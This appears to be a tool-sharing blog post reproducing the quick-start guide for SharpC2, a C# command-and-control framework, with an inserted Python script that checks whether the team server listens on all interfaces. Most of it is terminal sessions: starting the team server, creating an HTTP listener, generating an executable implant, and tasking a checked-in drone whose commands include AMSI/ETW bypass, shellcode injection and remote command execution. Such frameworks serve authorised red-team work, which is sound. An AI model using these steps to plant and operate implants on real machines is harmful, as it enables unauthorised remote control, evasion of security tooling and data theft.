A C2 Framework Written in C#
Author: Sec-Labs | Published:
SharpC2
SharpC2 is a C2 (command and control) framework written in C#.
The solution consists of an ASP.NET Core team server, a .NET Framework implant, and a .NET client.
Project URL
https://github.com/SharpC2/SharpC2
Quick Start
The quickest way to get started is to clone the framework from GitHub, then build and run the debug version.
PS C:\Tools\SharpC2> dotnet build
Client -> C:\Tools\SharpC2\Client\bin\Debug\net6.0\SharpC2.dll
TeamServer -> C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0\TeamServer.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.98
Start the team server
PS C:\Tools\SharpC2> cd .\TeamServer\bin\Debug\net6.0\
PS C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0> dotnet TeamServer.dll -p Passw0rd!
info: Microsoft.Hosting.Lifetime[14]
Now listening on: https://0.0.0.0:8443
info: Microsoft.Hosting.Lifetime[0]
Application started. Press Ctrl+C to shut down.
info: Microsoft.Hosting.Lifetime[0]
Hosting environment: Production
info: Microsoft.Hosting.Lifetime[0]
Content root path: C:\Tools\SharpC2\TeamServer\bin\Debug\net6.0
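Note: if the server is in Development mode, it only listens on localhost. To make sure it runs in Production mode (and therefore listens for connections on all interfaces), set the ASPNETCORE_ENVIRONMENT variable to Production.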
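A check for the note above, as an added example that is not part of the original post or the SharpC2 project: it parses ASP.NET Core startup lines of the shape shown in the output and reports whether each listener is bound to loopback only or to every interface. The function names and the sample log text are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample input, in the shape of the startup output shown above.
SAMPLE_LOG = """\
info: Microsoft.Hosting.Lifetime[14]
      Now listening on: https://0.0.0.0:8443
info: Microsoft.Hosting.Lifetime[0]
      Hosting environment: Production
"""

LISTEN_RE = re.compile(r"Now listening on:\s*(\S+)")
ENV_RE = re.compile(r"Hosting environment:\s*(\S+)")


def bind_scope(host):
    """Classify a bind host as 'loopback', 'all-interfaces' or 'specific'."""
    if host.lower() == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "specific"  # a hostname other than localhost
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified:  # 0.0.0.0 or ::
        return "all-interfaces"
    return "specific"


def audit_startup_log(text):
    """Return the hosting environment, each listener's scope, and whether
    any listener is reachable from outside the local machine."""
    env = ENV_RE.search(text)
    listeners = []
    for url in LISTEN_RE.findall(text):
        parts = urlsplit(url)
        listeners.append((url, parts.port, bind_scope(parts.hostname or "")))
    return {
        "environment": env.group(1) if env else None,
        "listeners": listeners,
        "exposed": any(scope != "loopback" for _, _, scope in listeners),
    }


if __name__ == "__main__":
    print(audit_startup_log(SAMPLE_LOG))
```

An "exposed" result means the management port should be restricted by a host firewall or bound to a specific interface before the server is left running.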
Start the client
PS C:\Tools\SharpC2\Client\bin\Debug\net6.0> dotnet SharpC2.dll -s localhost -p 8443 -n rasta -P Passw0rd!
___ _ ___ ___
/ __| |_ __ _ _ _ _ __ / __|_ )
\__ \ ' \/ _` | '_| '_ \ (__ / /
|___/_||_\__,_|_| | .__/\___/___|
|_|
@_RastaMouse
@_xpn_
Server Certificate
------------------
[Subject]
CN=localhost
[Issuer]
CN=localhost
[Serial Number]
67B4A5487F67745B
[Not Before]
25/02/2021 21:01:43
[Not After]
25/02/2022 21:01:43
[Thumbprint]
B968C8D9C2B40F4AD7A46C92B0B700DEE46492FE
accept? [y/N] >
Create and start an HTTP handler
Use the create command to create a new handler. Usage: create <name> <type>. Valid types are HTTP, TCP and SMB.
[drones] > handlers
[handlers] > list
No Handlers
[handlers] > create demo-http HTTP
[+] Handler "demo-http" created.
Once a handler has been created, you can set its parameters with the set command. Usage: set <handler> <parameter> <value>.
[handlers] > set demo-http BindPort 8080
[+] BindPort set to 8080
[handlers] > set demo-http ConnectPort 8080
[+] ConnectPort set to 8080
Finally, use the start command. Usage: start <handler>.
[handlers] > start demo-http
[+] Handler "demo-http" started.
[handlers] > list
Name       Running
----       -------
demo-http  True
Generate a payload for the handler
Use the payload command to generate a payload for a handler. Usage: payload <handler> <format> <path>. Valid formats are Exe, Dll, Raw and Svc.
[drones] > payload demo-http Exe c:\payloads\http-drone.exe
[+] 164352 bytes saved.
Execute the payload and the Drone should check in.
[+] Drone fea75efa53 checked in from Daniel@Ghost-Canyon.
[drones] > list
Guid        Parent  Address        Hostname      Username  Process     Pid    Integrity  Arch  LastSeen
----        ------  -------        --------      --------  -------     ---    ---------  ----  --------
fea75efa53  -       192.168.1.229  Ghost-Canyon  Daniel    http-drone  17300  Medium     x64   18/12/2021 16:11:20
Interact with the Drone
Use the interact command. Usage: interact <guid>.
[drones] > interact fea75efa53
[fea75efa53] > help
Name              Description
----              -----------
abort             Abort a running task
back              Go back to the previous screen
bypass            Set a directive to bypass AMSI/ETW on tasks
cat               Read a file as text
cd                Change working directory
execute-assembly  Execute a .NET assembly
exit              Exit this Drone
getuid            Get current identity
help              Print a list of commands and their description
link              Link to an SMB Drone
load-module       Load an external Drone module
ls                List filesystem
mkdir             Create a directory
overload          Map and execute a native DLL
ps                List running processes
pwd               Print working directory
rm                Delete a file
rmdir             Delete a directory
run               Run a command
services          List services on the current or target machine
shell             Run a command via cmd.exe
shinject          Inject arbitrary shellcode into a process
sleep             Set sleep interval and jitter
upload            Upload a file to the current working directory of the Drone
[fea75efa53] > getuid
[+] Tasked Drone to run getuid: 3989657f56.
[+] Drone checked in. Sent 176 bytes.
[+] Drone task 3989657f56 is running.
GHOST-CANYON\Daniel
[+] Drone task 3989657f56 has completed.
Tags: tool sharing, C2 framework